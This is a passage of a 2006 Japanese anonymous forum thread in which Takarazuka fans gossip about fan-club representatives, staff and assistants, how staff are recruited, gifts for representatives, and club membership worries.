>>120と同じく会からOK出たら自力チケを手放す。
オクに出すほど日程に余裕がないことが多いから、自力チケは差額を諦めてサバく。

122 :名無しさん@花束いっぱい。:2006/11/18(土) 04:37:47 ID:Hr7KwOGF
豚ぎりスマソ
タニ代表東西兼任で子持ちで、子供さんそろそろ小学生よね?
東公演中はお子様お休みするのかな?
旦那さんは良いんだろうか…
あ、リアルに参観とか運動会に居る(●▽●)を想像してしまったw

123 :名無しさん@花束いっぱい。:2006/11/18(土) 09:46:49 ID:q15Q06JH
旅芸人みたいに転校させてたりして
子供は災難だね

124 :名無しさん@花束いっぱい。:2006/11/18(土) 09:57:30 ID:jWFo/iJu
わたるさんとこの東西それぞれの会はどんな感じだったの?代表とかスタッフとかガードとかお茶会とか諸々…

125 :118:2006/11/18(土) 15:42:11 ID:wLo79acQ
>119-121
ありがとうございました。 
さりげなくアピールが重要ですね。 
入ったばかりで分からなかったのでありがとうございました。

126 :名無しさん@花束いっぱい。:2006/11/18(土) 19:59:31 ID:N4OLsbRs
>>122
母が定期的にどこかしらで代表をやっている。
幼稚園・小学生のときは東宝や遠征の旅に祖母や叔母夫婦に預けられた。
(父は仕事で忙しいくて子育ては無理だった)

成長して宝塚は好きになったけど母はなんか嫌いだ。
タニ代表の子もお気の毒・・・。

127 :名無しさん@花束いっぱい。:2006/11/18(土) 20:23:16 ID:N9p32+nB
今日の並びで再実感したけど…FCってすごいな。
色んな意味で。

128 :名無しさん@花束いっぱい。:2006/11/19(日) 00:44:57 ID:gYMR8fZB
>>122
え??
もう小学校?まだ幼稚園くらいじゃないの?

129 :名無しさん@花束いっぱい。:2006/11/19(日) 13:56:35 ID:YZVRHqYc
>124
私は東わた会しかわからないけど、
ふつうだと思うよ。まぁお茶会土産や
千社札のセンスは…だけどね。
ガードでは、テキパキ仕事をこなしてた
感じのよいスタッフさんもいたよ。

130 :名無しさん@花束いっぱい。:2006/11/19(日) 22:23:47 ID:YXaFTd7V
知り合いが東下級生会でスタッフしてます。
わたさんの代表さんスタッフさん、皆感じの良い方だったと話していました。
下級生会にも優しく指導して下さったようです。

131 :名無しさん@花束いっぱい。:2006/11/19(日) 23:22:01 ID:HAhguA0w
もうOGになったからいいよね,
わたる西会は,とってもこわかったデス。
一人で静かに入り出とか参加してたんですけど・・・
メッチャ感じ悪くて嫌でした。
お茶会も4回行きましたがトークもつまらなかった。
入り出待ちで少し冷めて〜お茶会で一気冷めてしまいました。
ラダメスしか見てない。




132 :名無しさん@花束いっぱい。:2006/11/23(木) 02:00:59 ID:qbn4T2Px
私も1人活動してたから、私のことだと思われたら嫌だなぁ。
つるんでいるスタッフさんは確かにハタ目には怖かったが、
皆さん仕事はきちんとしているし、ガードの時なんかは親切だったよ。
会活動に不満はなかったな。
その後の皆さんの行方がちょっぴり気になるこの頃。どこに流れるんだろね。





133 :名無しさん@花束いっぱい。:2006/11/23(木) 15:42:24 ID:2A4+NuNe
星組の東会FCは全体的に雰囲気良さそう。
それほど厳しくなさそう。

134 :名無しさん@花束いっぱい。:2006/11/23(木) 23:22:27 ID:He4XCVrq
スレタイ検索しても出てこないと思ったら、FC大文字かよ。
ムカついたからage

135 :名無しさん@花束いっぱい。:2006/11/23(木) 23:51:01 ID:55Kv/uJ8
>133
今まではね。
とうこ会キツそうだよ。

136 :名無しさん@花束いっぱい。:2006/11/24(金) 00:07:04 ID:TjziRaEG
ちえ会も雰囲気悪そ

137 :名無しさん@花束いっぱい。:2006/11/24(金) 00:08:21 ID:Ghv3mS3T
わた会、東西入ってた知人が西は事務処理が悪い…と愚痴っていた。
質問がある時は往復ハガキ指定なのに返事もこない…と。
数年前だから最後のほうは変わったのかもだけど。
つーか往復ハガキで問い合わせ…ということ自体が初耳だったんだが
トップ会はそういうとこ多いのかな?

138 :名無しさん@花束いっぱい。:2006/11/24(金) 00:56:14 ID:sNZTsHwQ
なんかこわいね〜
こればっかりは、スタッフの人柄とかにもよるし、ある意味、運かも。

139 :名無しさん@花束いっぱい。:2006/11/24(金) 18:23:25 ID:FMiCuRzp
FCに今年入会したんですが、全国ツアー各地のチケ出しにも代表さん
が来ていて驚きました。旅費、滞在費も自腹だとしたら大変ですよね。
代表さんに日頃の感謝という意味で3000円ぐらいのお菓子をプレゼント
しようと思うのですが、皆さんは何かされていますか?
ちなみに会の規模は小さいです。

140 :名無しさん@花束いっぱい。:2006/11/24(金) 20:16:06 ID:+6LuRT8v
>135
キツそうには見えないけどなー。
傍から見てる私には。

141 :名無しさん@花束いっぱい。:2006/11/24(金) 21:50:20 ID:uJVaaDiT
>>139
お菓子は普段から嫌と言うほど貰うそうだし、かさばったら迷惑だから、
クオカードとか商品券もしくは現金の方が嬉しいって知り合いに聞きました。
やっぱり「かさばらなくて使える物」が基本だと思います。


142 :名無しさん@花束いっぱい。:2006/11/24(金) 22:33:10 ID:OjORz9qE
小さい会だとお菓子もそこまで貰えないから、お菓子で嬉しいよ。

143 :名無しさん@花束いっぱい。:2006/11/24(金) 22:44:08 ID:GOvQQWAr
代表太るからお菓子はダメーっ。
ほんとかさばらないし、現金・商品券系にしてあげて下さいm(__)m
小さい会なら持ち出しばかりだし、少額でも本当助かるんだから。

144 :名無しさん@花束いっぱい。:2006/11/25(土) 01:06:28 ID://QZHezI
>>137
それ東じゃない?
逆の話聞いてた。
会服届かないとか当日チケット無いとか不手際話多いよ。
スタッフも仕切り悪いと。
西の方が返事すぐ来るのにーとグチってた知り合い。


145 :名無しさん@花束いっぱい。:2006/11/25(土) 01:35:09 ID:DyDQVxCs
私は代表じゃなくてスタッフにお菓子とか消耗品渡すよ。
代表はお小遣いだったり、お菓子だったり色々貰い物をするけど小さい会だとスタッフには降りないから。
ヨレヨレになって奉仕してくれているので、感謝の気持ちを込めてお渡ししてる。

146 :名無しさん@花束いっぱい。:2006/11/25(土) 01:53:27 ID:xbVgqmQ5
>140
会の雰囲気は悪くはないけど
東の代表はキツイよ。

147 :名無しさん@花束いっぱい。:2006/11/25(土) 05:20:41 ID:Y0WUzq4K
age

148 :名無しさん@花束いっぱい。:2006/11/25(土) 05:27:25 ID:Y0WUzq4K
>144
それって前の代表の時じゃないの?代表変わって事務面など大分よくなったように思うけど…

149 :名無しさん@花束いっぱい。:2006/11/25(土) 08:23:41 ID:Vlgak485
>146
東代表そうかなあ?そんなに出張ってこないし特にキツイ印象ないけど…
とうこ会はスタッフがよく働いてるイメージある

150 :名無しさん@花束いっぱい。:2006/11/25(土) 11:08:27 ID:172QRFst
139です。
 
141さん、142さん、143さん、145さん、ありがとうございました。
商品券ですか…金額が少額だとちょと渡しにくいですね。




151 :名無しさん@花束いっぱい。:2006/11/25(土) 12:59:26 ID:VeaGDdCe
3000円なら十分だよ。1000円とかの商品券でもよくありますよ。
私も少しでも現金系の方が助かると思います。

152 :名無しさん@花束いっぱい。:2006/11/25(土) 14:44:47 ID:ga3lVIyo
でも、商品券は若いお嬢さんはやめときなね。
それなりの年代の方ならいいけど。
年齢相応の気持ちのあらわし方というものがあるから。

153 :名無しさん@花束いっぱい。:2006/11/25(土) 22:06:21 ID:82539lsx
3000円程度なら現金を花代にすればいいよ。
商品券は不便だし。

お菓子ならスタッフにも回るから、本当に労いたいならやっぱりお菓子がいいよ。

154 :名無しさん@花束いっぱい。:2006/11/25(土) 22:30:18 ID:Mii4ez21
お菓子も好みがあるし、無難なものがよいかと。

155 :名無しさん@花束いっぱい。:2006/11/25(土) 23:52:39 ID:7TR0yPte
別に何でもいいじゃん
気持ちがこもってればいいでしょ?
あとは代表・スタの人間性の問題でしょ?w


156 :名無しさん@花束いっぱい。:2006/11/26(日) 00:14:04 ID:LFLMyjPM
お菓子も嬉しかったですよ
他の会にもおすそ分けしたりできますしね


いただいて不便だったのは果物類ですね…

157 :名無しさん@花束いっぱい。:2006/11/27(月) 00:48:33 ID:fvTNiyqP
前星1西会の新参会員だったけど
スタッフは皆、とても親切だったよ。
まあ、事務処理は遅いけど。

158 :名無しさん@花束いっぱい。:2006/11/27(月) 20:52:16 ID:9IR1zhc0
お礼状とは通常、公演が終わってからどれくらいで着ますか?

159 :名無しさん@花束いっぱい。:2006/11/27(月) 22:27:03 ID:gevKOntF
大体1ヶ月前後くらい

160 :名無しさん@花束いっぱい。:2006/11/28(火) 21:07:00 ID:MRlD2oPW
で、結局とうこのとこはどうなの?

161 :名無しさん@花束いっぱい。:2006/11/28(火) 23:59:40 ID:sHNnIfw0
>157
トップ会の事務処理が遅いのは会員が多いんだから、他会に比べれば遅いのはしょうがないこと。

162 :名無しさん@花束いっぱい。:2006/11/29(水) 03:10:07 ID:+tYdMP9T
>161
その分スタッフも多いでそ。
事務処理の遅い早いは規模は関係ないよ。
それこそ代表とスタッフの手腕による。

163 :名無しさん@花束いっぱい。:2006/11/29(水) 06:47:47 ID:KZRj1piP
>162
私の友達、トップ会のスタッフでしたが、同じ組の二番手のスタッフの方が多いってくらい、そのトップ会はスタッフ少なかったとのこと。だから一概に言えないと思うけどな…

164 :名無しさん@花束いっぱい。:2006/11/29(水) 07:17:15 ID:ZdbFP9DN
>>163
何言ってんの?
それならスタッフを増やせばいいだけのこと。

ファンの少ない下級生会はスタッフを確保するだけで大変だが、仕事は少ない。
ファンの多いスター会は仕事が多くて大変だが、スタッフになれる人材も多い。

どちらもやらなければいけないことは同じだよ。

165 :名無しさん@花束いっぱい。:2006/11/29(水) 09:36:44 ID:jL/Wect4
代表がどーしようもなくて、スタッフがぼろぼろやめるとこもあるからね。
やめさせてるとも言うんだけどさ。
どことは言わないが、トップの東会もスタッフ少ないぞw

166 :名無しさん@花束いっぱい。:2006/11/29(水) 10:32:30 ID:ZdbFP9DN
>>165
そういうことも含めて、会の責任だからねー。
てか、そんな会ってけっこうたくさんあるよねw

「スタッフがやめるのは、切られたから」と一般人は思いがちだが、
実際はほとんどの場合において逆。

167 :名無しさん@花束いっぱい。:2006/11/29(水) 11:09:39 ID:ctKMMPQo
タニ会代表ってまた妊娠してるの?
昨日見たけど、すごい腹が迫り出してた。
昨日も娘膝に乗せて2列目で観劇で、タニは娘に手振ってた。

168 :名無しさん@花束いっぱい。:2006/11/29(水) 11:14:52 ID:+tYdMP9T
スタッフが少なかろうが減ろうがそれは会の問題だから
それが事務処理の遅い言い訳にはならんわな。
スタッフ少なくたって事務処理の早いスター会もいくらでもあるし
スタッフは充実してるのに事務処理の遅い娘役会なんかもある。

169 :名無しさん@花束いっぱい。:2006/11/29(水) 11:17:22 ID:/42+6Mft
スタッフ探しも簡単じゃないからね…
ただ好きなだけじゃできないし、生徒とお近づきになりたい人もだめだし。
他の人のスタッフだった人に声がかかるのはそのせいもある。

170 :名無しさん@花束いっぱい。:2006/11/29(水) 14:50:23 ID:KZRj1piP
そうそう、意外とスタッフになれる人材って少ないんだよね。大半がおばさんだし、若すぎる子はだめだし、年相応でも走れなさそうだったり…大体東会のスタッフは仕事してる人がほとんどだからね。大変だと思うよ。

171 :名無しさん@花束いっぱい。:2006/11/29(水) 15:45:24 ID:8eE9RjPa
妊娠してるなら娘を膝抱きはしないでしょ・・。


172 :名無しさん@花束いっぱい。:2006/11/29(水) 16:35:29 ID:A+tgfqge
タニ会代表いくつ?

173 :名無しさん@花束いっぱい:2006/11/29(水) 18:01:11 ID:9/YvULCK
43か44。どなたかフォローw

174 :名無しさん@花束いっぱい。:2006/11/29(水) 18:57:26 ID:A+tgfqge
うちの母と同い年だー

175 :名無しさん@花束いっぱい。:2006/11/29(水) 20:20:54 ID:uC4tNYMp
50超えてるんじゃなかった?

176 :名無しさん@花束いっぱい:2006/11/30(木) 22:00:12 ID:lFNRo8yN
本日15時公演4列あたりサブセンでチビと感激してますた。

177 :名無しさん@花束いっぱい。:2006/11/30(木) 22:38:19 ID:Xq1Sc9qQ
東宝でもムラでも、はたまた博多までご一緒で
旦那さんは、どのような方なのでしょう?不思議。
まあ超お金餅には間違いないよね。

178 :名無しさん@花束いっぱい。:2006/12/01(金) 00:42:50 ID:0xZR0kEp
元アートの先生だしね>タニ代表
歌の先生らしいから歌おしえてやればいいのに

179 :名無しさん@花束いっぱい。:2006/12/01(金) 01:27:10 ID:sv+aYxqm
膝に乗せて観劇していいのは3歳未満まで。
タニ代表の子供はすでに3歳超えてるからタダ見ってこと。
今度見かけたら、劇場係員に通報しましょう!

180 :名無しさん@花束いっぱい。:2006/12/04(月) 22:40:27 ID:gRfXhHCt
M・H様
今回出来たあなたの会代表は本当に大丈夫ですか?
あの代表は会だけでなく、せっかく伸びてきているあなたもダメにしますよ。
よく考えられた方がいいですね。

181 :名無しさん@花束いっぱい。:2006/12/04(月) 23:11:56 ID:SVPx6zQM
そうかなぁ。ファンも増えていい感じだとおもうけどなぁ…。

182 :名無しさん@花束いっぱい。:2006/12/04(月) 23:35:05 ID:x0LkJQUE
>180
本人に直接手紙かけば?
そういう手紙が多ければ、本人も何か考えるでしょ。
たまにファンより代表が大切って生徒もいるけどね(w
私は手紙書けるほど、その代表さんも会のことも知らないけど、
手紙も書けない癖にこんな所に書くのは止めて欲しい。
会関係の書きこみは、全部私のせいにされるんだから。
私は会の書きこみなんて一度もしてないのに。

183 :名無しさん@花束いっぱい。:2006/12/05(火) 00:17:01 ID:tbCJlyk5
>>182
>会関係の書きこみは、全部私のせいにされるんだから。

一体何者かと。

184 :名無しさん@花束いっぱい。:2006/12/05(火) 00:37:21 ID:sBOaOUVu
少しでも会に意見した事があると疑われるんだよね。
普段従順で文句言わないタイプがネットで文句言うのにw

185 :名無しさん@花束いっぱい。:2006/12/05(火) 01:14:58 ID:oj84oWo6
とにかくその代表が気にくわないんでしょ。
たぶんその代表ココ見てると思うよ。

186 :名無しさん@花束いっぱい。:2006/12/05(火) 09:32:05 ID:Abn4E3j7
>>180
M.Hって誰よ?


187 :名無しさん@花束いっぱい。:2006/12/05(火) 09:38:18 ID:JClFd2mS
ウメ代表はタニ代表についていけるんでしょうか……………

188 :名無しさん@花束いっぱい。:2006/12/05(火) 11:42:34 ID:l7DkLykg
>183
お礼状をもらえなかった者ですが。
この言葉でその会の東京の人なら分かるはず。
超身バレ(w

>185の言うとおり、チェックしてるみたいですね。
ここと、その生徒の期のスレを。

でも、会のスタッフ以上の人で、
ここをチェックした事ない人なんているのかな?
友達の会の幹部さんは、
この手のスレに書き込みがあっても、
全部無視して欲しいと言ってたらしいけど。
レスすると延々とレスされるから。
だから、あの時レスしなかったんだけど、
おかげで私のせいにされてしまったよ。
あのレスいれた人、恨むよ、全く・・・。



189 :名無しさん@花束いっぱい。:2006/12/06(水) 00:43:44 ID:X/RjEeAX
>>188
自ら身バレするようなことを書く人も珍しいね。

190 :名無しさん@花束いっぱい。:2006/12/06(水) 10:53:13 ID:BXPVCZMD
・・・つまり成りすましてるってことかとw

191 :名無しさん@花束いっぱい。:2006/12/06(水) 22:02:22 ID:fXvA6cnn
春風弥里…?

192 :名無しさん@花束いっぱい。:2006/12/06(水) 22:04:26 ID:X/RjEeAX
>>191
一問一答スレにM・H宛のQが合って、Aがその後にあったはず。
そこで生徒名は分かる。見たけど知らない生徒で覚えられなかった。

193 :名無しさん@花束いっぱい。:2006/12/06(水) 23:23:57 ID:Y0YXpAkU
>190
なりすましじゃないですよ。
つーか、どっちのなりすまし?
やってないことを私のせいにされるのは、
我慢なりません。
前回、私はM.Hさんの代表、ファンの人について、
何一つ書きこみをした覚えはありません。
なのに、私のせいにされました。
身の潔白を訴えたくて、良い機会なので出て来たまでです。
本来ならこんなアホな事したくないですよ。
自分自身、痛いなあと思いますが、
あの一件のせいで、
代表さん達やファンの方とは
お話する事も出来なくなりましたからね。

これでM.H違いだったら笑える(w

194 :書き忘れ:2006/12/06(水) 23:25:56 ID:Y0YXpAkU
>180の書き込みも私じゃないですから。

195 :名無しさん@花束いっぱい。:2006/12/07(木) 00:03:57 ID:cP8un8Kj
身の潔白を訴えるのは、ここでは逆効果な気がするよ。
気をつけれ

196 :名無しさん@花束いっぱい。:2006/12/07(木) 01:08:52 ID:jaRFOUVR
一問一答スレより

>377 名前:名無しさん@花束いっぱい。 投稿日:2006/12/04(月) 22:33:03 ID:gRfXhHCt
>M・H様
>今回出来たあなたの会の代表は本当に大丈夫ですか?
>あの人が代表だと、会どころかあなたまでダメになりますよ。

>379 名前:名無しさん@花束いっぱい。 投稿日:2006/12/05(火) 07:08:22 ID:teLeGtmv
>>377雪組の桃花ひなです・・・

らしいよ。桃花ひななんて知らないなあ。有名?

197 :名無しさん@花束いっぱい。:2006/12/07(木) 03:51:00 ID:k2aHAIC/
>196
ネタの上にネタでおk?

198 :名無しさん@花束いっぱい。:2006/12/07(木) 15:17:46 ID:jaRFOUVR
おk

199 :名無しさん@花束いっぱい。:2006/12/07(木) 23:26:05 ID:Qr1poWC2
>195
dくす。
これで最後。
お目汚しごめん。

200 :名無しさん@花束いっぱい。:2006/12/08(金) 02:05:14 ID:DBLREblA
200

201 :名無しさん@花束いっぱい。:2006/12/08(金) 14:16:50 ID:2JB7ctNI
らんとむ会危機なの?

202 :名無しさん@花束いっぱい。:2006/12/08(金) 14:39:03 ID:qxbdVqcG
>201
なんで?

203 :名無しさん@花束いっぱい。:2006/12/08(金) 14:54:41 ID:nWINAm1v
今日は宙アンチの日

204 :名無しさん@花束いっぱい。:2006/12/08(金) 15:28:20 ID:/AFnZq10
なんだか気になる

205 :名無しさん@花束いっぱい。:2006/12/08(金) 15:51:15 ID:2JB7ctNI
FC会員にメールが送られてきたらしい。
ファンが少な過ぎてらんとむが悲しんでるとかなんとか。
んなのメールきたってどうしようもないんじゃあ…?

206 :名無しさん@花束いっぱい。:2006/12/08(金) 15:56:39 ID:OB19oef1
宙1オカッパおばさん、相変わらずガード内であれこれ言って
うざいんだよね
本当にかしちゃんファン?
かしちゃんの恥になるようなことばっかり言ってさ
自分が足ひっぱってるって気づかないのかな


207 :名無しさん@花束いっぱい。:2006/12/08(金) 15:58:28 ID:yN/VFKdv
>>205
えええー。
そりゃーファンが少ないのは可哀想だけど、
もっと可哀想なのは、んなことを会員全員に配信されたってことだ。
(そして、そんなことをしたら2ちゃんでリークされるに決まっているわけだし)

そんなことも想像つかないほどアフォなの?>らんとむ代表

208 :名無しさん@花束いっぱい。:2006/12/08(金) 16:23:30 ID:TLdilS6g
今ってどこの会も会員が少ないように思うのですがどうですか?

209 :名無しさん@花束いっぱい。:2006/12/08(金) 18:38:17 ID:kUhUHQpy
蘭とむよ、安心しろ。
ウチの方が少ないゾ。

210 :名無しさん@花束いっぱい。:2006/12/08(金) 18:53:06 ID:2/lY9FDx
うちも少ない・・・とほほ


211 :名無しさん@花束いっぱい。:2006/12/08(金) 19:09:55 ID:QtlKBVIo
そんなお知らせ、うちの会は毎公演くるぞ(*^ー゚)b

212 :名無しさん@花束いっぱい。:2006/12/08(金) 19:31:19 ID:2sJtNHvl
ウチの会は大人会の人数が一杯だから来年度から申込書送らんってさ。

今年度も先着順って…。

213 :名無しさん@花束いっぱい。:2006/12/08(金) 19:38:27 ID:DBLREblA
>211
うちもだしw
しかも本当に少ないもんだから207の言うように2ちゃんでリークされることもないw

214 :名無しさん@花束いっぱい。:2006/12/08(金) 20:12:52 ID:QtlKBVIo
>213
もまい、もしや同じ会ですかねw

215 :名無しさん@花束いっぱい。:2006/12/08(金) 21:05:48 ID:r1EK+MQO
らんとむ、贔屓は他にいるが応援してるゾ!
宙観に行った時はキミに釘付けだ!!

216 :名無しさん@花束いっぱい。:2006/12/08(金) 21:13:27 ID:u3nSBqJ2
>>215
赤面スレ及びポスタースレの住人さんでつか?

217 :名無しさん@花束いっぱい。:2006/12/08(金) 23:40:10 ID:aVN61HiB
宙の下級生は入り出やお茶会に結構人集めてるからなー。
比べちゃうと惨めな気持ちになるのかも。
花ではみんな少なかったから気にすることもなかったんだろうけど。

218 :名無しさん@花束いっぱい。:2006/12/08(金) 23:49:44 ID:TLdilS6g
新公学年でもお茶会100人は越えてたりしますからね

219 :名無しさん@花束いっぱい。:2006/12/09(土) 00:20:35 ID:9V/IGo9u
>>218
みわまつみつる、この辺りは新公学年で100人集めてたけど・・・
新公卒業したらいったん人気は落ちると言われているから、それからが勝負だよ。

220 :名無しさん@花束いっぱい。:2006/12/09(土) 00:41:43 ID:f/LqNtyU
新公学年の下級生ファンは新公のチケットを取ってもらうために、入り出や
お茶会(友達呼んだり)で頑張るから、人数はどこも多くなるんだよね。

新公が終われば、ぐっと少なくなるからそこからが勝負だね。

221 :名無しさん@花束いっぱい。:2006/12/09(土) 06:54:26 ID:o08BsYUT
かし会のオカッパおばさんが名簿集めしているらしいね
新しいファンクラブでも立ち上げるのか?!

222 :名無しさん@花束いっぱい。:2006/12/09(土) 09:54:51 ID:P4X+17EZ
うちの会は、さすがに生徒が悲しんでるとはいわないが
「入り出に来い」「並び参加しろ」「茶会に来い」って案内(メール、封書、並びに関してはTELも)はしょっ中。
いきなりその内容オンリーで手紙が来たときにはびびったが…
非路線やトップ会は別としてどこもそんなものでは?
その分会も色々と企画とかがんばってる。

223 :名無しさん@花束いっぱい。:2006/12/09(土) 11:34:21 ID:WTNmy5Y2
お茶会で生徒自ら「もっと入り出や観劇に来て下さい」とか言っちゃうんだよね
必死だな


224 :名無しさん@花束いっぱい。:2006/12/09(土) 17:26:49 ID:nlXtRtFb
最近トップになったとうこや、これからなるタニの会はスタッフ増やした?
こういうのって何を基準に声かけるんだろう・・
ちょっと興味あるんだけど。

225 :名無しさん@花束いっぱい。:2006/12/09(土) 18:15:27 ID:JWQwRlY8
妊娠していても子供膝に乗せたり抱っこはするでしょう。
3歳以上でも席に座らなければ膝上観劇はオーケーですよ。
ちなみに東京の劇場で聞いたことですが
うちの子は4歳で迷ったのですが
チケ買って隣に1人で座らせました。

226 :名無しさん@花束いっぱい。:2006/12/09(土) 18:17:29 ID:sPsgWqlo
平日に入り出によく行きチケットをそこそこ頼み 小綺麗にしてる人にお声掛かります

227 :名無しさん@花束いっぱい。:2006/12/09(土) 19:55:31 ID:Sgv2c0Yv
あんまり他の人たちとくっついてない人って聞いたことある >スタッフ

228 :名無しさん@花束いっぱい。:2006/12/09(土) 21:25:28 ID:jbg2L2Is
他にも性格とかも関わってくるんじゃない?
年齢もだろうし。

229 :名無しさん@花束いっぱい。:2006/12/09(土) 23:14:06 ID:yMOygFGP
20代くらいの子に声がかかりやすいの?

230 :名無しさん@花束いっぱい。:2006/12/09(土) 23:47:02 ID:6kS+Y3tc
三十台でしょ。かかりやすいのは。

231 :名無しさん@花束いっぱい。:2006/12/09(土) 23:59:44 ID:OLQaX9+J
はい、はいってゆうことききそうな人。

232 :名無しさん@花束いっぱい。:2006/12/10(日) 01:11:27 ID:I8+NU1+u
スタッフの世界は理不尽なことにも首を縦にふらないといけないことが多いので、
そういうことに耐えれそうな人。
あと、秘密を守れそうな人ね。

233 :名無しさん@花束いっぱい。:2006/12/10(日) 07:52:13 ID:zFMNC2dU
ここで既出な宙1のオカッパおばさんが、会に内緒で名簿集めて
かしちゃんにクリスマスプレゼントするって躍起になってて
かし会内異常事態らしいよ!
声がかかった友達は不気味がってた


234 :名無しさん@花束いっぱい。:2006/12/10(日) 10:01:28 ID:l0JPDgj2
研1のトニカって会あるの?

235 :名無しさん@花束いっぱい。:2006/12/10(日) 10:23:29 ID:EOuo5Szx
↑つーかここも8も何回もしつこいな。宙1ファン。上げて書く事か?
そんなに嫌ならアンタかその友達が、代表かそれに近い奴にコソっと密告
すりゃ良い話じゃん。こんなとこに書くなんてみっともな過ぎ。
「私の贔屓の会もうすぐ退団なのにこんななんですー」って。
アンタもある意味やってる事その人と同じだよ?

236 :名無しさん@花束いっぱい。:2006/12/10(日) 17:25:10 ID:RdcX0H/5
>>234
研1じゃお付きかいるかどうかくらいじゃん?

237 :名無しさん@花束いっぱい。:2006/12/10(日) 17:47:48 ID:xBOAnB+z
>>224
ミーハーじゃない人。
時間とお金に余裕がありそうな人。
会の中に仲良しがいない人
(どうしたって距離を置かなければならないし、ねたまれたりするので)。

下級生の会だったら学生もいるし(代表が学生ってこともある)、
上級生・路線だったら、やっぱりある程度の年齢いってる人が多い。

238 :名無しさん@花束いっぱい。:2006/12/10(日) 18:19:53 ID:xc94xMy5
ミーハーじゃない人ってのは、かなりポイント高い。
あちこち顔出しまくって生徒や他代表と繋がり持ってるとか、
それを自慢げに話すようなヤシはうざがられる。
タダのやりたいちゃんに見られるんだよね。
割りと役に立つんだけど生徒や周りは引いちゃう事が多いとオモ。

239 :名無しさん@花束いっぱい。:2006/12/10(日) 19:38:19 ID:0XkF1U3u
>>224
増やしたみたいだよ。
会に入ってる友人説ね。
退団が見えたから、って今からスタッフになるようなやつも十分ミーハーだよね。

240 :名無しさん@花束いっぱい。:2006/12/10(日) 19:42:36 ID:RdcX0H/5
>>239
トップになったらスタッフ増やさないと会員が迷惑するのに
増えたスタッフはミーハーと言われるのか。

241 :名無しさん@花束いっぱい。:2006/12/10(日) 20:31:51 ID:iYHD3lTx
 

242 :名無しさん@花束いっぱい。:2006/12/10(日) 21:32:07 ID:Jd5m4rmn
生徒や代表に知り合いが多いようなのは口も軽い。
生徒やおばさまと直に話したがったりもするからやっかいなんだよね。
使いようによっては便利な存在だけど。

243 :名無しさん@花束いっぱい。:2006/12/10(日) 23:02:10 ID:xBOAnB+z
>>239
スタッフに「なる」なんて簡単に書いてるけど、
代表と現スタッフが相談の上決めることがほとんどだから、
本人がやりたくたってなれるかはわからない。
逆にやりたがってない人の方が声がかかるよ。
まああまりにも人手が足りなければ妥協することもあるけど・・・

244 :名無しさん@花束いっぱい。:2006/12/11(月) 00:21:50 ID:lDuJ21se
そうそう。
スタッフは志願してなれるものじゃーないよ。

245 :名無しさん@花束いっぱい。:2006/12/11(月) 23:17:32 ID:IZTOUDKF
でもトップになる時にスタッフになると大変そうだよね。
私の友人は少し前にアシスタントやってたけど理不尽なことばっかりみたい。
それでも生徒のことが好きだから、最後まで続けてたけど・・・
とうこちゃんとこもタニちゃんとこもこれからが大変だろうね。

246 :名無しさん@花束いっぱい。:2006/12/12(火) 01:10:02 ID:f+uMfD6F
スタッフよりもアシスタントの方がもっと大変なんだよ。


247 :名無しさん@花束いっぱい。:2006/12/12(火) 13:24:00 ID:ZhtwPCrE
トップのアシは楽って聞いたけど。

248 :名無しさん@花束いっぱい。:2006/12/12(火) 13:42:51 ID:hX4QaC/c
大変かは別として、代表・スタッフにはこき使われ会員には気を使い、
アシスタントが一番ストレス溜まる気がする。
トップ会や上級生会にも気を使いまくって…これは代表・スタッフも同じだけど。
内心はバカバカしいと思っていても皆それに従ってるのは凄いと思うわ。

249 :名無しさん@花束いっぱい。:2006/12/13(水) 00:14:32 ID:o0BkaXzY
ココはトプ会アシのカキコ板か?w
アシの愚痴にしか見えん

250 :名無しさん@花束いっぱい。:2006/12/13(水) 09:25:18 ID:vuopTAq7
アシは一番こき使われて、ファンや代表、スタッフに気を遣い
でもって生徒とのおいしい部分は無しってこともあり。

251 :名無しさん@花束いっぱい。:2006/12/13(水) 10:18:22 ID:QYdXNxOq
それも承知でアシを引き受けたんなら、
文句いうな〜と思ってる私は了見狭いんですかね。


252 :名無しさん@花束いっぱい。:2006/12/13(水) 11:50:26 ID:aAp6Lkox
ウチの西会のアシスタント、劇場そばの高級ホテルにお泊まりで、会(もしくは代表)が料金払ってくれている。
生徒の要望にすぐ応えられるように、とのことらしいけど、アシスタントだよ?
東のアシスタント・スタッフは自宅から通っている。

253 :名無しさん@花束いっぱい。:2006/12/13(水) 13:51:24 ID:8jhcCxeg
お付きをやるのは大変ですか?

254 :名無しさん@花束いっぱい。:2006/12/13(水) 16:44:17 ID:hC8wTyc0
>>251
知識と実体験はまた違うんだよ・・・。
まあアシの扱いについては会によって全然違うだろうけどね。

>>252
現役でやってる人が、そんなこと書いて大丈夫?

255 :名無しさん@花束いっぱい。:2006/12/13(水) 17:11:14 ID:v40rOdo2
>>252 そんな所はほとんど皆無に等しいよ。
自己負担だらけが普通。

それとスタッフもアシも生徒とおいしい事なんか一つもないのが普通。
本当にそれ承知で引き受けたんだろうから、愚痴るのはおかしい。
全く無知な人が知らずに引き受けたって事?

256 :名無しさん@花束いっぱい。:2006/12/13(水) 17:30:02 ID:yeHyWd9K
生徒とスタッフだけで食事会はあったけど。

257 :名無しさん@花束いっぱい。:2006/12/13(水) 17:54:53 ID:v40rOdo2
>>133 そんな所ない所がほとんどだから書かない方がいいのでは?
信じちゃう馬鹿がいそうだし。
まぁ、なりたがりとか生徒に近付けると思ってる人にはほとんど声掛からないけどね。

258 :名無しさん@花束いっぱい。:2006/12/13(水) 18:27:28 ID:aopJumzJ
なんかv40rOdo2はミズさしてばっかだな。
しかも133みたいなことにまで・・・

252と同じこと、漏れも聞いた。
いま公演中の退団者のとこでそ?
金があるから、そーゆーことしてるんじゃね?
結局、東は西に吸収されちゃったとこだしな。
スタッフはともかく、アシは若い子使ってるし。

259 :257:2006/12/13(水) 18:36:40 ID:v40rOdo2
アンカー間違ってた!スマソorz
>>256に向けてです。(全然番号違う;)

260 :名無しさん@花束いっぱい。:2006/12/13(水) 23:03:34 ID:uyjbGKOA
タニ会の会服が黒なのは
かし会が白になることを見越してですか?
そして会服を脱いでも黒を着ていたのも対比ですか?

261 :名無しさん@花束いっぱい。:2006/12/13(水) 23:19:25 ID:O4CzK34I
代表が少しでも着痩せするように黒

262 :名無しさん@花束いっぱい。:2006/12/13(水) 23:27:45 ID:wftMImyB
生徒とスタッフの食事会なんてない所もあるよ。
スタッフになったら生徒と口きくこともなくて「おはようございます」って言ってもらえる会員さんが羨ましいくらい。
まぁ、夢をもっていたいならスタッフなんて死んでもやるな。

263 :名無しさん@花束いっぱい。:2006/12/13(水) 23:49:06 ID:9CKvc9CQ
タニ会の代表さん、どこを読んでも評判よくないけど
